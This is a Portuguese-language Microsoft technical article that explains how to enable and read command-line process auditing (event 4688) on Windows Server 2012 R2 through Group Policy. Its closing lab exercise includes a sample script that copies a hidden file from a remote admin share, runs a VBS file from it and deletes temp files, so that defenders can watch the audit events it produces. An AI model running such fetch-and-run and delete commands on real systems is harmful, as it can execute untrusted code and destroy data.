Partilhar via


Auditoria de processo de linha de comando

Autor: Justin Turner, engenheiro sênior de escalonamento de suporte com o grupo do Windows

Observação

Este documento foi criado por um engenheiro de atendimento ao cliente da Microsoft e é destinado a administradores e arquitetos de sistemas experientes que procuram explicações técnicas mais profundas para recursos e soluções no Windows Server 2012 R2 do que aquelas geralmente oferecidas em tópicos do TechNet. No entanto, ele não passou pelas mesmas etapas de edição que eles, por isso a linguagem pode parecer que menos refinada do que a geralmente encontrada no TechNet.

Visão geral

  • A ID do evento de auditoria de criação de processo pré-existente 4688 agora incluirá informações de auditoria para processos de linha de comando.

  • Ele também registrará o hash SHA1/2 do executável no log de eventos do Applocker

    • Logs de Aplicativos e Serviços\Microsoft\Windows\AppLocker
  • Você habilita por meio do GPO, mas ele fica desabilitado por padrão

    • "Incluir linha de comando em eventos de criação de processo"

Captura de tela que realça a Linha de Comando do Processo.

Figura SEQ Figura \* ARABIC 16 Evento 4688

Examine a ID de evento 4688 atualizada no REF _Ref366427278 \h Figura 16. Antes dessa atualização, nenhuma das informações da Linha de Comando do Processo era registrada em log. Devido a esse registro em log adicional, agora podemos visualizar que não só o processo de wscript.exe foi iniciado, mas que ele também foi usado para executar um script de VB.

Configuração

Para visualizar os efeitos dessa atualização, você vai precisar habilitar duas configurações de política.

É necessário ter a auditoria de Criação de Processo de Auditoria habilitada para visualizar a ID do evento 4688.

Para habilitar a política de Criação de Processo de Auditoria, edite a seguinte política de grupo:

Local da política: Políticas de Configuração > do Computador > Configurações do Windows > Configurações de Segurança > Configuração Avançada De Auditoria > Acompanhamento Detalhado

Nome da Política: criação do processo de auditoria

Com suporte em: Windows 7 e superior

Descrição/Ajuda:

Essa configuração de política de segurança determina se o sistema operacional gera eventos de auditoria quando um processo é criado (iniciado) e o nome do programa ou usuário que o criou.

Esses eventos de auditoria podem ajudá-lo a entender como um computador está sendo usado e acompanhar a atividade do usuário.

Volume de eventos: baixo a médio, dependendo do uso do sistema

Padrão: não configurado

Para visualizar as adições à ID do evento 4688, é necessário habilitar a nova configuração de política: Incluir linha de comando em eventos de criação de processo

Tabela SEQ Tabela \* ARABIC 19 Configuração de política de processo de linha de comando

Configuração de política Detalhes
Caminho Modelos Administrativos\Sistema\Criação de Processo de Auditoria
Configuração Incluir linha de comando em eventos de criação de processo
Configuração padrão Não configurado (não habilitado)
Com suporte em: ?
Descrição Essa configuração de política determina quais informações são registradas nos eventos de auditoria de segurança quando um novo processo é criado.

Essa configuração se aplica somente quando a política de criação de processo de auditoria está habilitada. Se você habilitar essa configuração de política, as informações de linha de comando para cada processo serão registradas em texto sem formatação no log de eventos de segurança como parte do evento de criação de processo de auditoria 4688, "um novo processo foi criado" nas estações de trabalho e servidores nos quais essa configuração de política é aplicada.

Se você desabilitar ou não definir essa configuração de política, as informações de linha de comando do processo não serão incluídas nos eventos de Criação do Processo de Auditoria.

Padrão: não configurado

Observação: quando essa configuração de política está habilitada, qualquer usuário com acesso para ler os eventos de segurança poderá ler os argumentos de linha de comando para qualquer processo criado com êxito. Argumentos de linha de comando podem conter informações confidenciais ou privadas, como senhas ou dados de usuário.

Captura de tela que mostra

Ao usar definições avançadas da Configuração de Política de Auditoria, você precisa confirmar se essas configurações não foram substituídas pelas configurações básicas de política de auditoria. O evento 4719 é registrado quando as configurações são substituídas.

Captura de tela que mostra a caixa de diálogo Incluir linha de comando em eventos de criação de processo.

O procedimento a seguir mostra como evitar conflitos, bloqueando a aplicação de quaisquer configurações de política de auditoria básicas.

Para garantir que as definições da Configuração de Política de Auditoria Avançada não foram substituídas

auditoria de linha de comando

  1. Abra o console do Gerenciamento de Política de Grupo

  2. Clique com o botão direito do mouse em Política de Domínio Padrão e selecione Editar.

  3. Clique duas vezes em Configuração do Computador, clique duas vezes em Políticas e clique duas vezes em Configurações do Windows.

  4. Clique duas vezes em Configurações de Segurança, clique duas vezes em Políticas Locais e, em seguida, selecione Opções de Segurança.

  5. Clique duas vezes em Auditoria: forçar configurações de subcategorias de política de auditoria (Windows Vista ou posterior) para substituir configurações de categorias de política de auditoria e selecione Definir esta configuração de política.

  6. Selecione Habilitado e, em seguida, selecione OK.

Recursos adicionais

Auditoria do processo de criação

Guia Passo a Passo de Política de Auditoria de Segurança Avançada

AppLocker: perguntas frequentes

Experimente isto: explorar a auditoria do processo de linha de comando

  1. Habilitar eventos de Criação de Processo de Auditoria e garantir que a configuração da Política de Auditoria Avançada não seja substituída

  2. Crie um script que gere alguns eventos de interesse e execute o script. Observe os eventos. O script usado para gerar o evento na lição era assim:

    mkdir c:\systemfiles\temp\commandandcontrol\zone\fifthward
    copy \\192.168.1.254\c$\hidden c:\systemfiles\temp\hidden\commandandcontrol\zone\fifthward
    start C:\systemfiles\temp\hidden\commandandcontrol\zone\fifthward\ntuserrights.vbs
    del c:\systemfiles\temp\*.* /Q
    
  3. Habilitar a auditoria de processo de linha de comando

  4. Execute o mesmo script de antes e observe os eventos